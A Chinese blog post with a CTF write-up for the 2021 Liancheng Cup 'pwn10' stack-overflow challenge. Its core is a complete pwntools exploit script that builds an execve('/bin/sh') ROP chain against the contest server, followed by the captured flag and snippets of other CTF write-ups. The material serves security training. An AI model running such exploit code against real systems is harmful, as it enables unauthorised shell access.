2021年“莲城杯”网络安全大赛-PWN-pwn10(三血)

最新推荐文章于 2022-07-26 19:25:58 发布
最新推荐文章于 2022-07-26 19:25:58 发布
阅读量952 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 2021年“莲城杯”网络安全大赛 文章标签: 网络安全 python 2021年“莲城杯” PWN unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43264813/article/details/120717802
本文详细介绍了在2021年'莲城杯'网络安全大赛中的一道PWN题目,该题目涉及栈溢出漏洞。通过分析,发现程序没有PIE保护且存在特定的函数调用,允许利用长字符串覆盖内存。利用这些条件,作者构建了ROP链,最终实现系统的权限提升,获取shell。解题过程展示了如何寻找和组合ROP gadgets,以及构造payload来执行预定的系统调用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2021年“莲城杯”网络安全大赛-PWN-pwn10(三血)

题目名称:pwn10
题目内容:栈溢出。靶机:nc 183.129.189.60 10016
题目分值:100.0
题目难度:容易
相关附件:pwn10的附件.zip

解题思路:

1.保护机制,静态链接,没pie

在这里插入图片描述

2.主要函数

在这里插入图片描述在这里插入图片描述

3.做pwn要注意重点,输入一个长字符串,能把name冲掉,反正是个很大的数字,不用关注count是多少,反正够用。然后用不可寻址的地址找到偏移0x78,然后 rop syscall

```python
#!/usr/bin/env python
from pwn import *

local = 0
debug = 1
binary = "./pwn10"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
elf = ELF(binary)
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    libc = ELF(lib)
else :
    p = remote("183.129.189.60","10016")
    # lib = "./libc.so.6"
    libc = ELF(lib)

s      = lambda buf        : p.send(buf)
sl     = lambda buf        : p.sendline(buf)
sa     = lambda delim, buf : p.sendafter(delim, buf)
sal    = lambda delim, buf : p.sendlineafter(delim, buf)
sh     = lambda            : p.interactive()
r      = lambda n=None     : p.recv(n)
ru     = lambda delim      : p.recvuntil(delim)
r7f    = lambda            : u64(p.recvuntil("\x7f")[-6:]+"\x00\x00")
trs    = lambda addr       : libc.address+addr
gadget = lambda ins        : libc.search(asm(ins,arch="amd64")).next()
tohex  = lambda buf        : "".join("\\x%02x"%ord(_) for _ in buf)

rop = ""
rop += p64(0x00000000004016e6) # 0x00000000004016e6: pop rdi; ret; 
rop += p64(0x00000000006ccd60)
rop += p64(0x0000000000401807) # 0x0000000000401807: pop rsi; ret; 
rop += p64(0x0000000000000000)
rop += p64(0x0000000000442d16) # 0x0000000000442d16: pop rdx; ret; 
rop += p64(0x0000000000000000)
rop += p64(0x000000000041f884) # 0x000000000041f884: pop rax; ret; 
rop += p64(0x000000000000003b)
rop += p64(0x00000000004679a5) # 0x00000000004679a5: syscall; ret; 

raw_input()
payload = "/bin/sh\x00"
payload += "A"*0x70
payload += rop
payload += "A"*0x100


sl(payload)
sh()
# DASCTF{c7d94ca4c9a02a430d8c677cbaea192b}
津门pwn
清霂的博客
05-13 405
目录hello 嘿嘿,单独发纪念一下,首次在国内比赛做出一道pwn(23/59) hello #!/usr/bin/env python2 # coding=utf-8 from pwn import * arch = "amd64" filename = "hello" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) free_got=elf.got
ctfshow pwn10
qq_39980610的博客
08-22 593
pwn10
[BUUCTF]PWN10——[第五空间2019 决赛]PWN5
u014377094的博客
01-26 1789
这一道利用的是格式化字符串漏洞 首先checksec一下,发现是开了canary的32位程序 放入ida 我们可以看到,这是让我们将自己输入的密码和随机密码进行比对,当比对成功就会自己执行system。 先输入AAAA%08x...找到相应的位置。传送门:(2条消息) 格式化字符串漏洞原理详解_ditto的博客-优快云博客_格式化字符串漏洞 payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047) payloa
2021莲城网络安全大赛-Web-Easy_go()
qq_43264813的博客
10-12 2454
2021莲城网络安全大赛-Web-Easy_go() 目名称:Easy_go 目内容:你听说过gob吗?靶机:183.129.189.60:10006 目分值:100.0 目难度:容易 解思路: 1.根据提示,生成一个 gob 序列化文件: 2.上传该文件即可: ```go package main import ( "encoding/gob" "fmt" "os" ) type person struct { Name string } // if person.Na
2021莲城网络安全大赛-PWN-free_free_free
qq_43264813的博客
10-12 1407
2021莲城网络安全大赛-PWN-free_free_free 目名称:free_free_free 目内容:你一定很擅长free吧。靶机:nc 183.129.189.60 10023 目分值:300.0 目难度:中等 相关附件:free_free_free的附件.zip 解思路: 1.保护机制,本地libc与远程一样,就没必要加载附件那个 2.漏洞点 - double free 3.要爆破stdout,1/16的可能,stdout-0x43有7f的size,malloc_hook-
2021“绿城网络安全大赛
09-30
2021“绿城网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
2021莲城比赛包.zip
10-12
2021莲城比赛包.zip】是一个压缩包文件,包含了参与2021莲城网络安全竞赛的相关目和资料。这个比赛很可能是一个网络安全技术挑战赛,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全竞赛...
2021莲城网络安全比赛库精粹
资源摘要信息: "2021莲城比赛包.zip" ...综上所述,2021莲城比赛包.zip文件是对网络安全竞技领域的一次实践演练,参赛者将通过解决各种网络安全来提升自己的技能,同时也为网络安全事业的发展做出贡献。
CTFshow PWN 格式化字符串漏洞pwn10
Rt1Text的博客
03-27 798
checksec+运行 就是这个样子 确实还需要学习啊 KEEP LEARNING!!!!!! 32位 NX保护 ida进行中 if num == 16 即可cat flag 那么修改变量的值 明显的格式化字符串漏洞 确定参数位置 第7个 num跟进去 address=0x804A030 准备exp from pwn import* p=process('./pwn10') num_addr=0x804A030 payload=p32(num_add..
WICCTF-2021-pwnCTFM
05-12
2021津门ctf的pwn
津门2021CTF pwn
qq_39948058的博客
08-26 633
前言:这个一开始调通了,但是不知道正确的libc版本,远程没有打通,最后听了一下libc版本是11.4的libc2.23版本,才打通,很多洞,比较经典的是edit的READ容易写。写到freehook为onegadget即可,tcl,只解了一道,时间原因第二道pwn也没看,噗。。 漏洞点: 漏洞点这两个地方,他们都是在bss段里,而且位置比较临近可以直接考虑一下任意写,当时没太注意这个点,直接doublefree的,发现只给了4个chunk,所以没能构建出,又审计了一下edit R.
强网2021 pwn解析——babypwn
CoLin的pwn小屋
07-26 1046
强网2021 pwn回顾——babypwn
CTF基础知识
m0_65849838的博客
04-26 6804
文章目录一. CTF简介1.开启目并点击附件2.得到正文和flag①正文②FLAG二.竞赛模式1.开启目并点击附件2.正文和flag①正文理论知识Jeopardy-AwD-攻防模式AWP-攻防增强RHG-自动化[ AI自动化]RW-真实世界KoH-抢占山头Mix[混合]②flag.比赛形式1.开启目并点击附件2.正文和flag①正文线上线下②flag四.目1.开启目并点击附件二.正文和flag①正文WebPwnReverseCryptoMisc②flag 一. CTF简介 1
2021莲城网络安全大赛-Reverse-RE
qq_43264813的博客
10-12 1302
2021莲城网络安全大赛-Reverse-RE 目名称:RE 目内容:小心API;提交的flag为flag{md5(your_input)} 目分值:300.0 目难度:困难 相关附件:Readme的附件.exe 解思路: 1.读取了文件本身的前16个字节,并用输入的前4字节换掉MZ文件头,MD5后用来AES解密,并要求解密后的文本与输入的前16字节一致,直接爆破: 2.拿到前半部分flag输入的后16个字节是魔改的TEA: 获得后半部分Rever5e_Send__1t flag{d
莲城2021 Crypto writes up
weixin_56678592的博客
10-12 362
莲城2021 Crypto writes up #1 randomCrypto 目: from random import randint flag = 'flag{********************************}' b = [ ord(i) for i in flag ] a = randint(65, max(b)) encflag="" for i in range(len(flag)): encflag += str(bin((ord(flag[i])^a)<&l
GXY_CTF wp
Pdsdt1的博客
12-24 3608
文章首发于: Pdsdt‘s Blog 周六两场比赛Xman和GXY_CTF,Xman因为是选拔赛,身为二流web人员,自知和pwn爷爷们有差距,就没有太过于上心比赛,做了misc之后,就去做北工大的比赛了,这里主要记录一下,北工大的GXY_CTF,感谢队友们的辛勤付出,PWN师傅一天打两场比赛真的很辛苦,这里把战队的所有解出目贴出 WEB 禁止套娃 这个目是最后一波放的目,不过按照目顺...
2020web安全测试——wp
qq_45927819的博客
11-22 584
文章目录就这么直接getflag 就这么直接 查看一下源码会发现一个hint.php,访问: <?php $key = "********"; srand(time()); $a = rand(0,100); $b = rand(0,100); $c = rand(0,100); $d = rand(0,100); $e = rand(0,100); $result = ((($a - $b)/$c)+$d) * $e; $result = md5($key.$result.$key); ech
羊城战队writeup
weixin_45883223的博客
09-12 2579
com nc 183.129.189.60 10028 按1,得到一堆数字,z3解方程组,exp如下: from z3 import * a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16, a17, a18, a19, a20, a21, a22, a23, a24, a25, a26, a27, a28, a29, a30, a31, a32, a33, a34, a35 = Ints("a1 a2 a3 a4 a5
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值